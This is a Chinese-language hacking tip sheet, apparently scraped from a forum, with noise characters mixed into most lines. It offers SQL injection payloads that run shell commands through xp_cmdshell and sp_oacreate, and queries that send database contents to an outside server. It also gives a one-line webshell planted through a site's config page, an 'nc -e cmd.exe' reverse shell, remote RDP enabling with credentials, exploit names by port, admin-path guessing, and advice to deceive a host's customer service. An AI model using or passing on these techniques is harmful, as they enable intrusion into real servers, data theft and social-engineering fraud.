SA点数据库分离技术相关$ V% @( S2 {2 ~* a) i
& N+ |( ^. R4 _/ I, m! T
& p) j' I: \# }- CSA点数据库分离搞法+语句:3 V# [" `* x/ v2 ?; ]; _
; v7 S- O" e* l \! f* _
注射点不显错,执行下面三条语句页面都返回正常。
2 x4 x" F {) mand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')% _- l9 q& R. w, ~" ]
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')8 \' A6 B8 ]$ l5 q
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
3 s3 M( V( { x可以列目录,判断系统为2000,web与数据库分离
% N: G2 O" X' p; F遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。7 m8 j5 }2 h4 S
在注射点上执行
. ~! a5 z% [, i; R" F. sdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
" O( U+ x, Q5 z4 C- X页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP$ P, B4 W J2 x. k% A2 q$ v+ [0 H
还有我用NC监听得其他端口都没有得到IP。6 R. B& R0 t# I5 ~
, A% a% b! [1 D! I6 s" e) Z- m8 L3 l通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
/ ?" ~. F, Z: k* A9 ~- y1 ~'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--# @4 }, b% i% B5 E$ j- [1 `+ L
; g9 m4 {% Z# {;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--, T: c3 u& g: B& F& _
9 D" g D3 v8 n
现在就猜想是不是数据库是内网而且不能连外网。
' Y% E0 ]: A8 c g. u3 h0 O* q+ z9 V' b" |
* K: ?4 l0 s4 H" b2 z4 r
access导出txt文本代码
* u$ e% m( m. V3 NSELECT * into [test.txt] in 'd:\web\' 'text;' from admin; ^1 k9 ~7 m" [
# S/ {# T4 ^; o3 c/ g1 C+ W8 M, d( ~
( r% Y- M: a5 { ?2 I
自动跳转到指定网站代码头
2 \* {/ C1 w9 |* _5 d<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'> S. z5 m) n! W. U K- j; N6 m: [
3 E% V7 e) ^5 d+ J- l" b7 v
; Y5 O: Q" m' J) ]3 g1 Y( f8 |$ ^0 P
入侵java or jsp站点时默认配置文件路径:( {* s s8 w( R, G- q9 r
\web-inf\web.xml6 y9 V }, i' Y0 R0 p; s e1 b
tomcat下的配置文件位置:
& V9 i" D3 _& J5 x. A# K/ I\conf\server.xml (前面加上tomcat路径)& p9 G- D& O& n
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
5 K' }* ^' _. u" o2 a; I" Q* u. n3 w6 {: C4 i H; J! v$ S
# s8 t6 Z1 v# e9 H0 B- A% I
; Y$ W8 x m' X' p: M9 k
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:" b( y+ C/ ]8 L# N
-1%23
. T& t$ d- i* E1 Q>
; w$ K6 ]# c2 n& e" I3 i5 v<: Y! \7 R, s* q
1'+or+'1'='1
8 g8 p) |2 f, |+ W; Lid=8%bf
" i3 v, |( ]( [) [3 ^) C
3 P1 f: p/ f- A/ R全新注入点检测试法:
2 M0 {) \5 Q$ C, Q3 w在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。% ~( w2 K& Y& v9 q; D, u
" c. Z8 G# p$ Q2 N6 i在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
0 B9 W: j# W: W, f
4 t- ^: Z/ T- t搜索型注入判断方法:
. c: Z" d, q4 d [# e% s北京%' and '1'='1' and '%'='
/ ]; z7 |2 v) L) m北京%' and '1'='2' and '%'=' V3 o. @7 [% l8 j* Z
: {) H% ]1 g7 y& ]; ?
0 T1 o9 k- x$ V3 e! I' G. UCOOKIES注入:$ a, N+ K) H7 N5 ^# c
, v; r, b5 a4 M- p, Kjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
1 y) b @ C9 P1 p3 Y5 O; _/ z0 D4 Z/ a; ^0 K |$ k B, L9 h4 ~ n1 P
2000专业版查看本地登录用户命令:/ q1 e) V' A' R1 r
net config workstation" X3 k4 J" z* @% f- f/ Y6 d
|: y+ A. x8 `* M8 n: }8 |# [7 ]' G, y3 Z
2003下查看ipsec配置和默认防火墙配置命令:
1 `$ S( [* u& v, x ~1 [, qnetsh firewall show config
0 Q' z% N8 q' S* g. t3 |. Tnetsh ipsec static show all
# F& i' y0 q8 [5 p/ h
. I. F* g8 l) l6 d+ _! p# n% X. m不指派指定策略命令:
& m3 N, l/ P% }- E" Gnetsh ipsec static set policy name=test assign=n (test是不指派的策略名)
* F! `6 @! S. j5 @9 lnetsh ipsec static show policy all 显示策略名! Y7 H ^1 ?9 a$ o7 J! m) b' t
* _4 y* k- B; |: c7 L$ {% D M* C: W- ?
猜管理员后台小技巧:9 J J* D# \! O0 D
admin/left.asp & x/ h6 Y9 l3 N0 h0 w2 T# Z
admin/main.asp
4 b, U; D# S# W; R, Yadmin/top.asp( I& m% r0 g+ d5 M* e
admin/admin.asp / ]0 ?* F, S% f2 ~% s. N
会现出菜单导航,然后迅雷下载全部链接
: W, t0 J; j* P0 }
( w" p6 T& \3 A$ ?& q: y ]- x; y
6 R9 I& v( ^0 f3 \社会工程学:
- u. F3 P. C' i5 z( y用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人& v$ J2 [* T9 N1 Z) ?
然后去骗客服
9 a& I6 R: E) z8 b* c5 l" X6 u5 `
9 Z" k: B0 t, u0 v/ y% D
' x" ]4 K. C0 a4 t$ M5 ]统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
7 u# a( I" k- k! x* c查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
X+ D9 g0 ]& @! k1 I6 n 存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
+ m1 [4 r3 c. O- Z* {. D. g I) i0 V. ^+ |! l2 V+ i! [6 P* n
! I9 Q6 ^. \& m
& M& i/ H# m; k/ e' q1 \
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)% g3 d" d7 s8 d8 T; I6 N* z! W
. W7 X# a4 n; R8 f; T" `; b$ A( P9 Q
# e& d; ~6 B2 `4 @0 }5 ?3 c: ?* j
CMD加密注册表位置' t; w9 p/ z+ i6 N
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor) v. k( u, A( e2 _
AutoRun0 A! b, ^7 z* w# l" }
/ J0 t' L4 n: }8 N(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
' T$ l8 `7 f, E3 |; eAutoRun
# R) z. D1 \, ^+ `/ w9 f# t( S. B, ]! j4 a1 S5 S6 o2 q
/ Q' R8 ]7 t% p
在找注入时搜索Hidden,把他改成test+ d0 w+ r% j% R* \
9 W/ _+ \# \0 k4 T" Z/ V9 K8 v6 @
$ p4 p w8 I. h3 G! N1 ?% X/ A
1 K' ?7 I h9 c% D2 d/ l; Pmstsc /v:IP /console 3 x5 |3 j" u$ T2 D7 N4 }# k! m
7 W; o% T% C# V4 [- h/ B$ @8 B
4 r5 f0 G! \/ T" y! K' L一句话开3389:
# d7 E7 u( ^1 z% F/ Y5 T1 j! B; W: y2 |6 D- B5 O
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>
% s1 W# X. g5 Z9 S$ j1 u, ]开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
3 J8 x/ P5 A/ p4 n' n6 m9 A# x4 o4 t
8 ^- f9 @$ j" v! B! v3 V) F* p( _2 H
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:1 _& S* y; m2 \, d
Insert into admin(user,pwd) values('test','test')
$ g6 ?. E6 R1 d+ j- P& B6 ^# i& |% L0 o( ~$ V# L. u
+ Q- q1 c8 X- _* s. Q! u/ h! P+ M% vNC反弹; |. O9 J y6 C" L6 b1 _2 D( ~1 r
先在本机执行: nc -vv -lp 监听的端口 (自己执行)
, [, T' }! b! X5 x+ ]0 M2 w然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
$ _& r$ w) p9 W. @0 Y! `4 k+ Q5 y0 Z, f' m9 [9 _) @6 ?- w3 T
, } B5 r6 T: U
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题( c# r/ J; ]$ F' }2 [- C% ?
( C( I9 S) j$ W2 ` D3 D/ R
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
$ |6 W+ g8 u* M: _& |" O0 n例如:
, g- N4 H9 A3 v9 T- w3 \subst k: d:\www\ 用d盘www目录替代k盘
9 {/ v/ [) ~3 B" ?% v' f/ ^4 o% `subst k: /d 解除K盘代替 |